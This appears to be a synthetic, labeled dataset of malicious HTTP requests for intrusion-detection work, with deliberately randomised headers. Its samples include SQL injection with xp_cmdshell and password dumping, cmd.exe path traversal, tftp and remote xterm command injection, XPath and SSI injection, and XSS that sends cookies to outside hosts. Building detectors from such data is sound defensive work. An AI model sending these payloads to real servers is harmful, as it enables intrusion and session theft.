If-Unmodified-Since: Fri, 25 Nov 05 11:42:33 GMT
If-Match: "oi2eAACtN9W1lC7bi"
If-None-Match: *
If-Range: *
Max-Forwards: 217
MIME-Version: 8.5
Pragma: ik=fo0f
Proxy-Authorization: Digest cnonce="uda3ny"
Authorization: maxa tcucs=osen1ec
Range: 907-3621,092-84571,369-460
Referer: /aClosdtZ/tzgi3Ilo/r0o5n.tar.gz
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 4.7; 7E-ei; rv:5.1.5) Gecko/95045509
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/0.9 137.63.203.23, Raae/5.9 www.alf7.js, 8.4 69.166.218.179
Transfer-Encoding: identity
Upgrade: legAa/6.2, aea/3.6, 9ebe/1.1, coNl/5.9
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 126.96.147.176
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38625
Start - Id: 41860
class: SqlInjection
GET /gryew/nWKNy8/nTzBuIM3LT/tR/2begcnf/tOmnilaeu.nsf?t5icT5bycmoeuuo=t%3Aes&eqTeNtmfte=4&etrjo=c&Gh8g3iIG=%27%3B++++begin+declare++++%40ret+varchar%288000%29++++set+%40ret%3D%27%3A%27++select++++%40ret%3D%40ret%2B%27++++%27%2Bih%2B%27%2F%27%2Bpassword++from++++enu3jt+++where+++sg%3E%40ret+++++select+%40ret++++as++++ret+++++into+foo+++end--&1nkc=538 HTTP/1.1
Host: 52.127.41.119
Connection: close
Accept: image/*, image/png
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.2, identity;q=0.9, gzip;q=0.6, gzip;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 124.36.76.191
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="72"
Date: Thu, 21 Jul 05 13:26:04 UTC
ETag: "a2V9IycN6MWKRF29Nv"
Expect: hbnaeaon=kuEqf
From: hth8n7i@4gf4.de
If-Modified-Since: Thu, 22 Jun 06 12:09:20 UTC
If-Unmodified-Since: Sat, 17 Jul 04 03:06:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7325
MIME-Version: 7.2
Pragma: j=lxU4
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: Basic aDNpZWQ6THF0VDE0bmc=
Range: -521,-331719
Referer: http://Smono.gov/qwctaqt/am6Hasdf/xeetoy.msf
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: na4sx5 http://www.vaeitebt.be
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: 0.9 70.225.13.111
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41860
Start - Id: 43529
class: OsCommanding
GET /yla5execAU/passwdnetcatK5C1Lk@f3IUFM/eoFdoeou5nietbc4rT/cmd7%uHh/nvoideexe/ex5i09@fkr1m0MwoQ/9dengxusdyDusReHE/vromsiinwy/iKVxrWjgwqCescfU.exe?kcRi4aRxp_=Il6hts5Thphta&yHSd=%27%3Buftp+++-g+++%2Fhome%2Fesmellntse%2Fitatasleti++179.63.15.128+%2Fol+++%3B&tmlian=nmw0tDlwtc%3C%3Ae&eblntedltaae7ct=eQhHdOOx&Ph2ulBI=itM&scg6keen=19&k6ois7i=liboyyeshutdownacceptut&l9PQfR=r&6L=3917277917&cO4UL=tdl HTTP/1.0
Host: www.AW7loj.cz:506
Connection: close
Accept: text/*;q=0.4, application/postscript;q=0.7
Accept-Charset: koi8-r;q=0.3, iso-8859-2;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: Lfatm='e'
Client-ip: 175.223.148.237
Cookie: stunteIu=auoam+B?ot2a13AxmlC9;Cjz.PaHL=byvelJYJCXgX
Cookie2: $Version="7"
Date: Wed, 09 Nov 05 19:29:16 GMT
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: hhdoic
From: se0nS@elUienypa.de
If-Modified-Since: Sun, 01 Apr 07 17:42:52 UTC
If-Unmodified-Since: Wed, 20 May 09 10:42:15 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Jan 04 15:36:36 UTC
Max-Forwards: 9
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic QWFhaWM6cm5pb0Ez
Authorization: Digest cnonce="dsQea"
Range: -983461,45-31195
Referer: /cepN4eti/mt6erda/atxr/ioituen.asmx
TE: trailers
Trailer: Expect
User-Agent: Mozilla/6.4 (Windows; U; Win98 2.1; rs-ad; rv:9.2.2) Gecko/71640737
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 612x3131
Via: 6.0 35.153.147.124, HTTP/4.3 www.eksfXe.tiff
Transfer-Encoding: compress
Upgrade: hlpxo/5.8, ate/4.1, k9h/8.3, atf7/2.6
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43529
Start - Id: 49356
class: XPathInjection
GET /O3HbgsoundtmpfromhttpsvabsQm/iyhnehdoaa/ow6lray/pp.cgi?idSRGWAO=dlNzg&aaott7e=rto0+einputbruirsnhtaccesnaccess_log&rJHuaBformxml=YeSn%3Etlhselect2%7C8h&d5=186&u027lktomt=4392277010&amc=917&loubheetais=55twto5+xmlwegyasddr&aiirounp=rdnuoedsoa0eirp&hgn=af9Q0SY&pseufutrsn=peieM%27+++or+++++sT%2Ff40o%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D310%5D+++++or+++++%27rjieqa7r%27++++%3D+%27&hectitsre=370185 HTTP/1.0
Host: www.iwlhv.de
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 220.29.194.166
Cookie: JdocumentqimgtD1c@ZB=hsrde3rlieSeien;3PGqcYH=eana5lueeauefinvgp;m3u=zeu;oesSlre0iLpi=icrinRbc4lt5SE1st;ihO8h=emaeiTMsIns
Cookie2: $Version="189"
Date: Sat, 21 Jul 07 08:38:33 CET
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Tue, 22 May 07 22:37:34 GMT
If-Match: *
If-None-Match: "fVDI5P1-cC7e9XqZ0F_"
If-Range: *
Max-Forwards: 86
MIME-Version: 2.9
Pragma: nha=3ta
Proxy-Authorization: Basic OXJxdGVpOmVjcGg=
Authorization: Digest opaque="Eoluor"
Range: 896-
Referer: http://taa4S.uk/9e4eiarm/eytSroe/o0za9ntp/e6pleol0.asmx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 7t2rrsul5obpt
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 953x2070
Via: 6.9 227.218.180.240, 5.0 218.159.103.117, lemunr/0.4 www.Bsse.jpeg:5417
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49356
Start - Id: 47005
class: XSS
GET /iaT/mE/pWscaihtcsaRqgeNId/Harecne2wnapiensr/esnb6hEz/selectHF/ivwpMUkwk5c-/fZAt9MepZV/ojriDeor/shJea.KedfdmewDb/trin6Amdldri.mdb?Ean2mtto=0h%3Ddt8ohavingonullerbsoinsert+drop&eso8taMynPsmdls=2208&rfsxE98t=%25uo&iIlHSh58q9H=%3Cimg+++++src+++%3D++++%22+++++ie%3E++%22++onmouseover+%3D++++%22%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.lltesita.com%2Fcgi-bin%2Fat.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&c0Pvn9=u%3Aha&8vinsert4xbdandVTfbody=38625&auEAeemm=1776&mwoednoyhiepnte=latpiosE4C&9ti=619721&tfxethn9=507&OeaatNc=wp-ya&eTtrdn=4479629522&set=a HTTP/1.0
Host: 112.71.147.11
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: SFoooy-tSnfom;q=0.9, el-8yc, e-eiTtwos, ypvp0o-Xiee;q=0.8, zrN-aaAatxeb;q=0.8
Cache-Control: min-fresh=9
Client-ip: 56.72.28.92
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="07"
Date: Thu, 06 Oct 05 07:58:59 GMT
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Sun, 16 Apr 06 16:27:56 CET
If-Match: "ngF--lPBlW1KJj0P"
If-None-Match: "81tETmx3dg0EJmVebvH"
If-Range: Sun, 18 Oct 09 22:55:45 GMT
Max-Forwards: 01
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Digest uri=http://www.hnk7xso4.fr/ttaimr/Neratne0.css
Range: 5-22964
Referer: /aeteco/cnhttmh.jsp
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.6 (Windows; U; WinNT 1.2; xo-1E; rv:4.9.0) Gecko/56706758
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 347x3393
Via: 5.3 128.194.204.112, FTP/2.4 254.40.235.15:29, 1.1 205.201.60.208
Transfer-Encoding: deflate
Upgrade: l9oe/6.6, lEdpas/0.5, d78nsb/8.9
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47005
Start - Id: 36512
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 13.167.72.35
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wldvicer-loB;q=0.7, s-th, nargrt0c-n;q=0.2, scnnuur-Airat;q=0.1, GrhrunUo-ffwrt;q=0.9
Cache-Control: ctwc='Hs'
Client-ip: 138.104.69.2
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="048"
Date: Thu, 31 Jan 08 18:19:40 UTC
ETag: W/"XSBTdwWVG7jW_uARV"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Thu, 25 Aug 05 20:27:25 UTC
If-Match: "iav@rE@413P9UXcn1uZ"
If-None-Match: *
If-Range: *
Max-Forwards: 3924
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM NzdyNnRvcmFiYTJhdHNvZGxheG5tbmVzb2ltbmtpaUV4dXhvcmFpcw==
Range: 7303-,26337-
Referer: /oues/qqlditOn/iptds/n1etomx/cztoh.conf
TE: trailers,deflate,deflate;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (compatible; Konqueror/8.6; WinNT; upir; 6nydkdi; nantiodrg)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: FTP/9.5 www.bth5n.jpg, 8.5 www.teEd5.html, 2.5 130.222.178.34
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36512
Start - Id: 41026
class: SqlInjection
GET /d2Ckc/y7SX4FC2ZpJhAuP5/o.d53fMy2BQ/eermsthiudh8kbOa/dncepmhSmhteroohtr.cgi?rua=t2T&6sy8rttyUpece=ine+nim&b50dTVjQTl=dy&nh1=yglkimoftdNvyfdoa&hmnx=aU3E.MCG6s&eofd8=exec+++xp_cmdshell+++++%27%22i8n1Astltc%22+++++%3E%3E++++script.vbs%27&n3neirnpf2cr9=td2&deaajcTo=hhoexaohnmcsucts%29R&lbsbd=ss0bf2&6zaAtntku8n=974596 HTTP/1.0
Host: www.ThOy.fr
Connection: keep-alive
Accept: image/jpeg;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: rmw-a;q=0.2, odRnocWu-IarisImt, 7dHE-nt;q=0.5, ew-t6e8h, 4Me-sods7re;q=0.3
Cache-Control: only-if-cached
Client-ip: 2.230.114.150
Cookie: rrplike@passwdjY=2Qdnmj.;jtls=hi1;rsiMiR6itAAhts=(eliftp;eeAinz=133019;ui6welinr=nXfBz-e-;nMidmiuQ50e=ynldcuxinirSxtdB
Cookie2: $Version="66"
Date: Sat, 02 Jan 10 22:50:51 GMT
ETag: W/"Vc2bixOBDSoczi4S"
Expect: yuEtt
From: spbhn@ispeCheey.net
If-Modified-Since: Tue, 17 Feb 09 14:47:11 CET
If-Unmodified-Since: Tue, 13 Jan 04 14:34:07 UTC
If-Match: "a9ole1Jb_W6diAhPC@"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.6
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: lIainj 9eeoiltf=seddibai
Range: 770-,-93926
Referer: http://wuelsmen.net/o0oain9s/m2spsh/1lrnoiw/tsod/3bnf2u.pdf
TE: trailers,trailers,gzip;q=0.9
User-Agent: Mozilla/9.9 (Windows; U; WinNT 2.6; dr-no; rv:5.8.7) Gecko/56137905
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: FTP/2.4 www.hdylu.htm
Transfer-Encoding: identity
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41026
Start - Id: 47898
class: XSS
GET /Rtar/tu/aasieT/dYACd.G36YAOFIY0GV9G.cgi?G1W58YkDL=%3Cdiv+onmouseover%3D+++%22+++%5Bwindow.open%28%27http%3A%2F%2F226.2.77.237%2Fneet.msf%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&Ceaes78hz=2Ia5cO37r HTTP/1.0
Host: 79.149.27.118
Connection: keep-alive
Accept: video/quicktime;q=0.4, image/jpeg;q=0.7
Accept-Charset: euc-cn, euc-tw, macintosh
Accept-Encoding: 
Accept-Language: miuivo-hyrdna;q=0.0
Cache-Control: no-store
Client-ip: 84.29.195.15
Cookie: n8ehldh7pT6ed=vstdinrtafromlogssr'ol7+li7;tih73ren=93|ia7ilibnertCeni;g-B0743S7qq=659;sw=58;eIsleel=632513;oaqrnRRvee=24933
Cookie2: $Version="7"
Date: Fri, 29 Sep 06 20:55:29 UTC
ETag: "mGKHO@G07@ZWa.b4v"
Expect: eiJ8sc
From: rigu@deao.net
If-Modified-Since: Mon, 23 Jul 07 11:48:31 GMT
If-Unmodified-Since: Mon, 22 Dec 08 16:00:00 CET
If-Match: *
If-None-Match: "uFA8eu01lA2N9_OH"
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 9411
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: heh4ty Atut=eajVe0in
Range: -635,-78,-03
Referer: /c1a8a5e/oeii/ttnta/0eS9/etro.tiff
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 8.0; ix-ce; rv:9.6.5) Gecko/57168490
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47898
Start - Id: 47369
class: XSS
GET /Ctop5iye8fsNtbeee/noiet1s/ofttese9tl/stntefmiegwcsir5ssd1/a6qJi.gqPuhGLKj/jiq4XyIJ5nhlLB/I3gS/siax6mH4t2YUBE3Fp-YA.aspx?7se3=udmri&rl=%3Ec&xvno=neqerodehhsreeoro&sewmtf=8&wydoedn=nsot77betweeniul9&k9copen1Nimgmk-M-=%3Cscript++++%3Ealert%28%27tGie.tsIeoe%27%29%3C%2Fscript+%3E HTTP/1.0
Host: 142.38.255.1:3385
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic, x-mac-hebrew, shift_jis, iso-8859-4;q=0.3, euc-tw
Accept-Encoding: deflate, deflate;q=0.3, compress;q=0.8, compress, gzip
Accept-Language: iri4-gi;q=0.8, zge-ieil;q=0.5
Cache-Control: no-store
Client-ip: 61.200.67.223
Cookie: o8rb=1453;Foeutiow=scuAcHHsrp(runwo;ihee=275561;dnraigahaelmw=011199
Cookie2: $Version="004"
Date: Wed, 25 Jul 07 05:11:54 GMT
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Sun, 16 May 04 15:52:17 GMT
If-Unmodified-Since: Tue, 19 Jun 07 05:35:27 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Jun 08 07:47:00 GMT
Max-Forwards: 1
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic cmF5MzZ1ZDplb3R2
Range: 35419-,75138-2674,165640-
Referer: /rinf/UtxNadyu/noedl.gif
TE: deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 5.6; ih-el; rv:1.0.5) Gecko/69783330
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 605x5902
Via: HTTP/7.6 www.ecligt.htm
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 138 242.136.246.70 "dtmun" "Thu, 13 Sep 07 03:49:01 CET"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47369
Start - Id: 39403
class: SSI
GET /aslLqIieTFiRrhan42o/hfiiow/eaVH@CGiqeXOAICmhZ/hH_OH9jWFz.tiff?snlRttmd=nitcp&mtl=3781103&v1oieetadffees=66&hUnetcat-kphp40NXS=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&MtTaeitror=8185&3i0ps=tg&afnetcatEXWsystemtelnetz=li8ssoepneoEgsshs&aqohlqmo=8lisu&1fhpehoEtdhd48d=9o&@RKX5jexecHFw9=mTeTCzV0Ct&BqyD8log=221 HTTP/1.1
Host: www.kngeauE.be
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.3, windows-1255, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Cookie2: $Version="6"
Date: Tue, 27 Nov 07 02:00:52 CET
ETag: W/"25Kpjj4nIKKJBndjeb"
If-Unmodified-Since: Sat, 17 Jul 04 23:58:21 CET
If-Match: *
If-Range: Fri, 14 Jan 05 02:43:13 UTC
Max-Forwards: 8
Pragma: no-cache
Authorization: Basic ZXRlRTp1YmxjbGYy
Referer: /mf3so/sjnlhnn/Bnno.jpg
Trailer: If-Match
User-Agent: Mozilla/7.1 (compatible; MSIE 1.8; Unix; sxtA; r8ioe7ad8e)
UA-CPU: x86
Via: Ztdhwx/7.2 www.hSme.css, 8.3 www.2aaavaba.png:55495
Transfer-Encoding: gzip

null

End - Id: 39403
Start - Id: 46702
class: XSS
GET /pd2Z@/lMDHZjNHeoLzx/disl.tiff?nenF2ruptnoathn=i%40lVWac.&h0rcgeT=5683&P6z8zm=cg5e%28fa+eehttpinsertegla&hesnqlapcteDt=21661039&tuerm8yy=%3Emeei%2F&tg1tocenejnoas=rieE&Ei6=6&rc8sae=uxnfKiX8&TxWZk9xnph-qAP=b0tE&IW6aeioaoInns=isehet&3nbi=n5y6efinclude&d8jEnee=aRaiyelersltnbi HTTP/1.1
Host: www.udrdrap.st:20
Connection: close
Accept: image/gif
Accept-Charset: windows-1252;q=0.9, iso-8859-4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.153.71.59
Cookie: asnhsott=2nedeoW;me3sl3mod=6813;iisyo0eu=<a    href="javas&#99;ript&#35;[document.location.replace    ('http://www.nt.com/cgi-bin/asansien.cgi'+document.cookie);]   "   >;iGeotyzkctblby=s
Cookie2: $Version="000"
Date: Sat, 27 Mar 10 17:47:19 GMT
ETag: W/"brH8Xc_QOwh1tFEjJ175"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Sat, 20 Oct 07 04:18:43 CET
If-Unmodified-Since: Fri, 21 Oct 05 14:47:21 GMT
If-Match: "w_9.H._V43VfXOR."
If-None-Match: "pUR.jYtEh83-K_P3"
If-Range: *
Max-Forwards: 55
MIME-Version: 7.6
Pragma: l=ne
Proxy-Authorization: Digest response="1bBcCaEA6bC8BfAfD0a30fDd1BdA2dB7"
Authorization: Basic ZG5vaHJBaW86dGV3d28=
Range: 932-03,777-
Referer: http://www.kiaasr.it/orib/0cneis/ta2tz/sjtt.gif
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 3.9; y7-hh; rv:6.0.3) Gecko/69738842
UA-Disp: 417,1521,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1564x628
Via: nqmu/7.4 7.253.144.136, g5Ls/8.7 www.vteosa.css
Transfer-Encoding: avii; 4ernEa1=trdwd
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 220.87.91.135
X-Serial-Number: 24725262315078744174
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 46702
Start - Id: 35526
class: XPathInjection
PUT /iQ/nFWMnxgTQ1968F@/ff7hrires/ejawlisisadr39T/b5eu97cLxsd.js? HTTP/1.1
Content-Length: 326
Content-Language: n,nCtoneN,tea7
Content-Encoding: identity
Content-Location: http://pinma58.de/yzvwQ/e5dsb/uipnuu/ishita3.htm
Content-MD5: dGFud3lsY25vb3dsYmo3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Nov 06 16:34:15 CET
Last-Modified: Mon, 10 Jan 05 12:15:40 GMT
Host: www.hRiog.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 6TshrI-q0ad, 5ss03xb-rudge, v-xWsy, shdeEEun-StrEr2, oicfh5mt-e;q=0.6
Cache-Control: min-fresh=67
Client-ip: 106.66.65.58
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="891"
Date: Wed, 26 Jul 06 05:51:18 GMT
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 09 Jul 06 11:55:54 CET
If-Unmodified-Since: Tue, 19 Jul 05 24:27:24 GMT
If-Match: "OR_kl7Ja7xN5J4NK"
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: Tue, 24 Feb 04 22:14:18 GMT
Max-Forwards: 9880
MIME-Version: 5.3
Pragma: no-cache
Authorization: NTLM dDZ0aGV0c2w3c2toZThlZWVvd3RmNnRpTWVuYU5hYXJpc25oVDVOYXN0cg==
Referer: /4aiv2ana/IHdk/onesp/gccosp/e7tpnc.cfm
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (compatible; Konqueror/5.2; Win98; 1ahtj; nsht)
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

Eosr=rrrhe&ce5L6=pairbwR0lbi(t&s0mev=5848578558&4bwvp54=4181&oesoee=hohy&atlIr=kmd0pcnp0tep4ahiid&Z4d_e3COc=psa1kestrb3e&ualfsoanevwsAoc=2479080&egds=th5wEn/raurna/iit/child::node()[  position()=1] |   xns/da2r/eeoYN/child::text()[position()=90]     or  '38d' =    '

End - Id: 35526
Start - Id: 42656
class: SqlInjection
GET /execbinFBMKDfautoexec62oS/jswhoneet/0kswrR0ohvwc/oonreu/lZn-RGJsB/a9YB_Szh1yqzfKUUf/u@@fhq-50aBpAE/e1s3rgxtbdssh/fFHc.iSDGPIg./aOyu0DCA/Handau/LPLt87Hz7winnt0xml0aIxp_.gif?formlinkgVqF2.a2s=72&PsEtJ=c3inlscwmheesDiry&rr=etisI%5Cmbin&wK29location5YG7nodel=ni5i+ceo%3Bi+qm%25tX%5B4n&nullu@29EfCRTTM=%27++union+++++select++++sum%28mwnhmr%29+from+++htaatey-- HTTP/1.0
Host: 24.193.200.87
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.9, identity;q=0.7, gzip, identity;q=0.2
Accept-Language: *;q=0.0
Cache-Control: sp='Btop'
Client-ip: 105.23.255.119
Cookie: qq1ha2ftaaao=8229;z1EMR=i6OEP.2uc;ehO=9;rubdaonj9ojgp=ijaunsop~jttni
Cookie2: $Version="8"
Date: Wed, 14 Sep 05 17:32:54 GMT
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Mon, 30 Nov 09 18:31:36 GMT
If-Unmodified-Since: Wed, 26 Jul 06 05:27:54 CET
If-Match: *
If-None-Match: "Co5Ib1fYMynF9ggmD7"
If-Range: Mon, 01 Aug 05 11:47:10 GMT
Max-Forwards: 8
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Basic ZWtsdHNldDpiYXlvazFydw==
Range: 339-5245,-077063
Referer: http://www.hspx.org/ntnae/Ii5nl/trpbshLw/edhmretw/2ogvrd.fgf
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/2.1 (Windows; U; WinNT 9.3; im-7n; rv:6.9.8) Gecko/25698278
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: deflate
Upgrade: fo6/1.0, ozs/3.7, re3mNl/0.5, osie/6.9
Warning: 058 www.Yai0bEs.jpg "ftaksn6eorlykneo" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 69822179
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42656
Start - Id: 43558
class: OsCommanding
GET /s0ige5sqdmeg/uexec/mrovisttrula/nPawratee9ucitatcsn/c3uzonie7mwo6eelcrja/ihpto32y4okpsro/si1Arhnoz8ziefNmc3d/awSdxRUkXcyhHY59m6Y/lereHhem/eKItj/bE3S5IaV0lSiT5gil/eeeenssItsloisE.shtml?esla7p=processing-instructionze%3Dy&htk4vigsp=71126&6oti=gyrdsloclnn&mtnjdele=%5Cr++++xterm++-display++++188.124.121.7%3A0.0&statt=Htinnwuelibnefinsert%29diva&kChomeG5=065932637&z4a.SO=%2BHeao&zthKoauulagn=qlwh4exree&nneAare2=82248615&msbhtd87Ss=839&DKs_W7mA=1499041 HTTP/1.0
